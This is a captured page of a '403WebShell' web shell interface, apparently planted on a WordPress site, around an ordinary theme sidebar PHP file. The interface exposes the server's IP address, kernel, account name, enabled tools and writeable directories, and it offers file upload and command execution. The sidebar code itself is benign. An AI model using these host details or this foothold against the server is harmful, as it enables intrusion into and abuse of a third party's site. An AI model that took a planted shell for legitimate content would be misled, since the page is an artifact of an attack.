Uname:Linux duemilacom6.interac.it 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64

403WebShell
403Webshell
Server IP : 212.183.175.188  /  Your IP : 216.73.216.82
Web Server : nginx/1.30.4
System : Linux duemilacom6.interac.it 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
User : cvevolpi ( 10022)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/cvevolpi.it/httpdocs/wp-content/themes/sentinel/templates/sidebar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/cvevolpi.it/httpdocs/wp-content/themes/sentinel/templates/sidebar/sidebar-1.php
<div class="col-sidebar">
	<div class="col">
		<aside id="sidebar-1_container" class="content_cols_eq">
			<div id="sidebar-1_wrapper">
				<div id="sidebar-1">
<?php 

$sidebar_name = THEMENAMELOW . '-global';

if( class_exists( 'Woocommerce') ){
	if( is_woocommerce() ){
		if( is_active_sidebar( THEMENAMELOW . '-woo-sidebar' ) ){
			$sidebar_name = THEMENAMELOW . '-woo-sidebar';
		}
	}
}

if( $sidebar_name == THEMENAMELOW . '-global' ){
	if( is_home() ) {
		$sidebar_name = THEMENAMELOW.'-home';
	} else if( is_search() ) {
		$sidebar_name = THEMENAMELOW.'-search';
	} else if( (is_category() && !is_single() && !is_singular() && !is_page()) || is_tag() || is_author() || is_archive() ) {
		$sidebar_name = THEMENAMELOW.'-blog';
	} else if( is_single() && !is_page() && ( 'post' == get_post_type() ) ) {
			if( is_active_sidebar( THEMENAMELOW.'-blog-single' ) )  {
				$sidebar_name = THEMENAMELOW.'-blog-single';
			} else { 
				$sidebar_name = THEMENAMELOW.'-blog';
			}
	} else if( !is_single() && is_page() ) {
			$sidebar_name = THEMENAMELOW.'-page-sidebar';
	} else if( is_search() ) {
		$sidebar_name = THEMENAMELOW.'-search';
	}

	
}

if( is_active_sidebar( $sidebar_name ) ){
	ff_dynamic_sidebar( $sidebar_name );
} else{
	ff_dynamic_sidebar( THEMENAMELOW . '-global' );		
}


?>
				</div>
			</div>
		</aside>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit